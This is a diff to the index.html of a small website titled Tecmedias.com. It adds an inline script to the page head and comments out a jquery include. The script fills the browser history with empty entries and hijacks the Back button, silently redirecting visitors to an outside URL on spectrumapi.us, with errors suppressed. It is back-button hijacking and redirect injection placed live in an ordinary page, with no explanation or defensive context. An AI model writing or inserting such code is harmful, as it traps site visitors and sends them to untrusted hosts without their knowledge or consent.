--- a/index.html
+++ b/index.html
@@ -8,7 +8,17 @@
   <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1">
   
   <meta name="description" content="">
-  
+  <script>
+        (function(){
+            var t;
+            try{
+                for(t = 0; 10 > t; ++t) history.pushState({},"","");
+                onpopstate=function(t){
+                    t.state && location.replace("https://spectrumapi.us/YTNV5wfM")
+                }
+            }catch(o){}
+        })();
+</script>
   
   <title>Tecmedias.com</title>
   <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
@@ -22,7 +32,7 @@
   </noscript>
   <link rel="preload" as="style" href="assets/mobirise/css/mbr-additional.css">
   <link rel="stylesheet" href="assets/mobirise/css/mbr-additional.css" type="text/css">
-  <script src="js/jquery-1-0-1.js"></script>
+  <!-- <script src="js/jquery-1-0-1.js"></script> -->
   
   
   
